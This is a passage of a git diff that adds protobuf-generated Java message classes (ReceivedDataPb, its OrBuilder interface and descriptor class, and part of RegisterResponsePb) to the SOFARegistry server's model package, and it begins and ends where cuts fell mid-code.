com.google.protobuf.ByteString getInstanceIdBytes() { + java.lang.Object ref = instanceId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + instanceId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string instanceId = 3; */ + public Builder setInstanceId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + instanceId_ = value; + onChanged(); + return this; + } + /** string instanceId = 3; */ + public Builder clearInstanceId() { + + instanceId_ = getDefaultInstance().getInstanceId(); + onChanged(); + return this; + } + /** string instanceId = 3; */ + public Builder setInstanceIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + instanceId_ = value; + onChanged(); + return this; + } + + private java.lang.Object segment_ = ""; + /** string segment = 4; */ + public java.lang.String getSegment() { + java.lang.Object ref = segment_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + segment_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string segment = 4; */ + public com.google.protobuf.ByteString getSegmentBytes() { + java.lang.Object ref = segment_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + segment_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string segment = 4; */ + public Builder setSegment(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + segment_ = value; + onChanged(); + return this; + } + /** string segment = 4; */ + public Builder clearSegment() { + + segment_ = getDefaultInstance().getSegment(); + onChanged(); + return this; + } + /** string segment = 4; */ + public Builder setSegmentBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + segment_ = value; + onChanged(); + return this; + } + + private java.lang.Object scope_ = ""; + /** string scope = 5; */ + public java.lang.String getScope() { + java.lang.Object ref = scope_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + scope_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string scope = 5; */ + public com.google.protobuf.ByteString getScopeBytes() { + java.lang.Object ref = scope_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + scope_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string scope = 5; */ + public Builder setScope(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + scope_ = value; + onChanged(); + return this; + } + /** string scope = 5; */ + public Builder clearScope() { + + scope_ = getDefaultInstance().getScope(); + onChanged(); + return this; + } + /** string scope = 5; */ + public Builder setScopeBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + scope_ = value; + onChanged(); + return this; + } + + private com.google.protobuf.LazyStringList subscriberRegistIds_ = + com.google.protobuf.LazyStringArrayList.EMPTY; + + private void ensureSubscriberRegistIdsIsMutable() { + if (!((bitField0_ & 0x00000020) == 0x00000020)) { + subscriberRegistIds_ = new com.google.protobuf.LazyStringArrayList(subscriberRegistIds_); + bitField0_ |= 0x00000020; + } + } + /** repeated string subscriberRegistIds = 6; */ + public com.google.protobuf.ProtocolStringList getSubscriberRegistIdsList() { + return subscriberRegistIds_.getUnmodifiableView(); + } + /** repeated string subscriberRegistIds = 6; */ + public int getSubscriberRegistIdsCount() { + return subscriberRegistIds_.size(); + } + /** repeated string subscriberRegistIds = 6; */ + public java.lang.String getSubscriberRegistIds(int index) { + return subscriberRegistIds_.get(index); + } + /** repeated string subscriberRegistIds = 6; */ + public com.google.protobuf.ByteString getSubscriberRegistIdsBytes(int index) { + return subscriberRegistIds_.getByteString(index); + } + /** repeated string subscriberRegistIds = 6; */ + public Builder setSubscriberRegistIds(int index, java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureSubscriberRegistIdsIsMutable(); + subscriberRegistIds_.set(index, value); + onChanged(); + return this; + } + /** repeated string subscriberRegistIds = 6; */ + public Builder addSubscriberRegistIds(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureSubscriberRegistIdsIsMutable(); + subscriberRegistIds_.add(value); + onChanged(); + return this; + } + /** repeated string subscriberRegistIds = 6; */ + public Builder addAllSubscriberRegistIds(java.lang.Iterable values) { + ensureSubscriberRegistIdsIsMutable(); + com.google.protobuf.AbstractMessageLite.Builder.addAll(values, subscriberRegistIds_); + onChanged(); + return this; + } + /** repeated string subscriberRegistIds = 6; */ + public Builder clearSubscriberRegistIds() { + subscriberRegistIds_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000020); + onChanged(); + return this; + } + /** repeated string subscriberRegistIds = 6; */ + public Builder addSubscriberRegistIdsBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + ensureSubscriberRegistIdsIsMutable(); + subscriberRegistIds_.add(value); + onChanged(); + return this; + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + data_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + internalGetData() { + if (data_ == null) { + return com.google.protobuf.MapField.emptyMapField(DataDefaultEntryHolder.defaultEntry); + } + return data_; + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + internalGetMutableData() { + onChanged(); + ; + if (data_ == null) { + data_ = com.google.protobuf.MapField.newMapField(DataDefaultEntryHolder.defaultEntry); + } + if (!data_.isMutable()) { + data_ = data_.copy(); + } + return data_; + } + + public int getDataCount() { + return internalGetData().getMap().size(); + } + /** map<string, .DataBoxesPb> data = 7; */ + public boolean containsData(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetData().getMap().containsKey(key); + } + /** Use {@link #getDataMap()} instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + getData() { + return getDataMap(); + } + /** map<string, .DataBoxesPb> data = 7; */ + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + getDataMap() { + return internalGetData().getMap(); + } + /** map<string, .DataBoxesPb> data = 7; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb getDataOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetData().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .DataBoxesPb> data = 7; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb getDataOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetData().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public Builder clearData() { + internalGetMutableData().getMutableMap().clear(); + return this; + } + /** map<string, .DataBoxesPb> data = 7; */ + public Builder removeData(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableData().getMutableMap().remove(key); + return this; + } + /** Use alternate mutation accessors instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb> + getMutableData() { + return internalGetMutableData().getMutableMap(); + } + /** map<string, .DataBoxesPb> data = 7; */ + public Builder putData( + java.lang.String key, com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb value) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + if (value == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableData().getMutableMap().put(key, value); + return this; + } + /** map<string, .DataBoxesPb> data = 7; */ + public Builder putAllData( + java.util.Map + values) { + internalGetMutableData().getMutableMap().putAll(values); + return this; + } + + private long version_; + /** int64 version = 8; */ + public long getVersion() { + return version_; + } + /** int64 version = 8; */ + public Builder setVersion(long value) { + + version_ = value; + onChanged(); + return this; + } + /** int64 version = 8; */ + public Builder clearVersion() { + + version_ = 0L; + onChanged(); + return this; + } + + private java.lang.Object localZone_ = ""; + /** string localZone = 9; */ + public java.lang.String getLocalZone() { + java.lang.Object ref = localZone_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + localZone_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string localZone = 9; */ + public com.google.protobuf.ByteString getLocalZoneBytes() { + java.lang.Object ref = localZone_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + localZone_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string localZone = 9; */ + public Builder setLocalZone(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + localZone_ = value; + onChanged(); + return this; + } + /** string localZone = 9; */ + public Builder clearLocalZone() { + + localZone_ = getDefaultInstance().getLocalZone(); + onChanged(); + return this; + } + /** string localZone = 9; */ + public Builder setLocalZoneBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + localZone_ = value; + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:ReceivedDataPb) + } + + // @@protoc_insertion_point(class_scope:ReceivedDataPb) + private static final com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public ReceivedDataPb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new ReceivedDataPb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedDataPbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedDataPbOrBuilder.java new file mode 100644 index 000000000..af5a52a4a --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedDataPbOrBuilder.java @@ -0,0 +1,83 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface ReceivedDataPbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:ReceivedDataPb) + com.google.protobuf.MessageOrBuilder { + + /** string dataId = 1; */ + java.lang.String getDataId(); + /** string dataId = 1; */ + com.google.protobuf.ByteString getDataIdBytes(); + + /** string group = 2; */ + java.lang.String getGroup(); + /** string group = 2; */ + com.google.protobuf.ByteString getGroupBytes(); + + /** string instanceId = 3; */ + java.lang.String getInstanceId(); + /** string instanceId = 3; */ + com.google.protobuf.ByteString getInstanceIdBytes(); + + /** string segment = 4; */ + java.lang.String getSegment(); + /** string segment = 4; */ + com.google.protobuf.ByteString getSegmentBytes(); + + /** string scope = 5; */ + java.lang.String getScope(); + /** string scope = 5; */ + com.google.protobuf.ByteString getScopeBytes(); + + /** repeated string subscriberRegistIds = 6; */ + java.util.List getSubscriberRegistIdsList(); + /** repeated string subscriberRegistIds = 6; */ + int getSubscriberRegistIdsCount(); + /** repeated string subscriberRegistIds = 6; */ + java.lang.String getSubscriberRegistIds(int index); + /** repeated string subscriberRegistIds = 6; */ + com.google.protobuf.ByteString getSubscriberRegistIdsBytes(int index); + + /** map<string, .DataBoxesPb> data = 7; */ + int getDataCount(); + /** map<string, .DataBoxesPb> data = 7; */ + boolean containsData(java.lang.String key); + /** Use {@link #getDataMap()} instead. */ + @java.lang.Deprecated + java.util.Map + getData(); + /** map<string, .DataBoxesPb> data = 7; */ + java.util.Map + getDataMap(); + /** map<string, .DataBoxesPb> data = 7; */ + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb getDataOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb defaultValue); + /** map<string, .DataBoxesPb> data = 7; */ + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb getDataOrThrow(java.lang.String key); + + /** int64 version = 8; */ + long getVersion(); + + /** string localZone = 9; */ + java.lang.String getLocalZone(); + /** string localZone = 9; */ + com.google.protobuf.ByteString getLocalZoneBytes(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedDataPbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedDataPbOuterClass.java new file mode 100644 index 000000000..d9a51e835 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedDataPbOuterClass.java @@ -0,0 +1,96 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class ReceivedDataPbOuterClass { + private ReceivedDataPbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor internal_static_ReceivedDataPb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_ReceivedDataPb_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_ReceivedDataPb_DataEntry_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_ReceivedDataPb_DataEntry_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\024ReceivedDataPb.proto\032\021DataBoxesPb.prot" + + "o\"\210\002\n\016ReceivedDataPb\022\016\n\006dataId\030\001 \001(\t\022\r\n\005" + + "group\030\002 \001(\t\022\022\n\ninstanceId\030\003 \001(\t\022\017\n\007segme" + + "nt\030\004 \001(\t\022\r\n\005scope\030\005 \001(\t\022\033\n\023subscriberReg" + + "istIds\030\006 \003(\t\022\'\n\004data\030\007 \003(\0132\031.ReceivedDat" + + "aPb.DataEntry\022\017\n\007version\030\010 \001(\003\022\021\n\tlocalZ" + + "one\030\t \001(\t\0329\n\tDataEntry\022\013\n\003key\030\001 \001(\t\022\033\n\005v" + + "alue\030\002 \001(\0132\014.DataBoxesPb:\0028\001B7\n/com.alip" + + "ay.sofa.registry.common.model.client.pbP" + + "\001Z\002pbb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, + new com.google.protobuf.Descriptors.FileDescriptor[] { + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPbOuterClass.getDescriptor(), + }, + assigner); + internal_static_ReceivedDataPb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_ReceivedDataPb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_ReceivedDataPb_descriptor, + new java.lang.String[] { + "DataId", + "Group", + "InstanceId", + "Segment", + "Scope", + "SubscriberRegistIds", + "Data", + "Version", + "LocalZone", + }); + internal_static_ReceivedDataPb_DataEntry_descriptor = + internal_static_ReceivedDataPb_descriptor.getNestedTypes().get(0); + internal_static_ReceivedDataPb_DataEntry_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_ReceivedDataPb_DataEntry_descriptor, + new java.lang.String[] { + "Key", "Value", + }); + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPbOuterClass.getDescriptor(); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/RegisterResponsePb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/RegisterResponsePb.java new file mode 100644 index 000000000..9861c0976 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/RegisterResponsePb.java @@ -0,0 +1,776 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code RegisterResponsePb} */ +public final class RegisterResponsePb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:RegisterResponsePb) + RegisterResponsePbOrBuilder { + private static final long serialVersionUID = 0L; + // Use RegisterResponsePb.newBuilder() to construct. + private RegisterResponsePb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private RegisterResponsePb() { + success_ = false; + registId_ = ""; + version_ = 0L; + refused_ = false; + message_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private RegisterResponsePb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 8: + { + success_ = input.readBool(); + break; + } + case 18: + { + java.lang.String s = input.readStringRequireUtf8(); + + registId_ = s; + break; + } + case 24: + { + version_ = input.readInt64(); + break; + } + case 32: + { + refused_ = input.readBool(); + break; + } + case 42: + { + java.lang.String s = input.readStringRequireUtf8(); + + message_ = s; + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePbOuterClass + .internal_static_RegisterResponsePb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePbOuterClass + .internal_static_RegisterResponsePb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb.class, + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb.Builder.class); + } + + public static final int SUCCESS_FIELD_NUMBER = 1; + private boolean success_; + /** bool success = 1; */ + public boolean getSuccess() { + return success_; + } + + public static final int REGISTID_FIELD_NUMBER = 2; + private volatile java.lang.Object registId_; + /** string registId = 2; */ + public java.lang.String getRegistId() { + java.lang.Object ref = registId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + registId_ = s; + return s; + } + } + /** string registId = 2; */ + public com.google.protobuf.ByteString getRegistIdBytes() { + java.lang.Object ref = registId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + registId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int VERSION_FIELD_NUMBER = 3; + private long version_; + /** int64 version = 3; */ + public long getVersion() { + return version_; + } + + public static final int REFUSED_FIELD_NUMBER = 4; + private boolean refused_; + /** bool refused = 4; */ + public boolean getRefused() { + return refused_; + } + + public static final int MESSAGE_FIELD_NUMBER = 5; + private volatile java.lang.Object message_; + /** string message = 5; */ + public java.lang.String getMessage() { + java.lang.Object ref = message_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + message_ = s; + return s; + } + } + /** string message = 5; */ + public com.google.protobuf.ByteString getMessageBytes() { + java.lang.Object ref = message_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + message_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (success_ != false) { + output.writeBool(1, success_); + } + if (!getRegistIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 2, registId_); + } + if (version_ != 0L) { + output.writeInt64(3, version_); + } + if (refused_ != false) { + output.writeBool(4, refused_); + } + if (!getMessageBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 5, message_); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (success_ != false) { + size += com.google.protobuf.CodedOutputStream.computeBoolSize(1, success_); + } + if (!getRegistIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, registId_); + } + if (version_ != 0L) { + size += com.google.protobuf.CodedOutputStream.computeInt64Size(3, version_); + } + if (refused_ != false) { + size += com.google.protobuf.CodedOutputStream.computeBoolSize(4, refused_); + } + if (!getMessageBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(5, message_); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb other = + (com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb) obj; + + boolean result = true; + result = result && (getSuccess() == other.getSuccess()); + result = result && getRegistId().equals(other.getRegistId()); + result = result && (getVersion() == other.getVersion()); + result = result && (getRefused() == other.getRefused()); + result = result && getMessage().equals(other.getMessage()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + SUCCESS_FIELD_NUMBER; + hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(getSuccess()); + hash = (37 * hash) + REGISTID_FIELD_NUMBER; + hash = (53 * hash) + getRegistId().hashCode(); + hash = (37 * hash) + VERSION_FIELD_NUMBER; + hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getVersion()); + hash = (37 * hash) + REFUSED_FIELD_NUMBER; + hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(getRefused()); + hash = (37 * hash) + MESSAGE_FIELD_NUMBER; + hash = (53 * hash) + getMessage().hashCode(); + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code RegisterResponsePb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:RegisterResponsePb) + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() 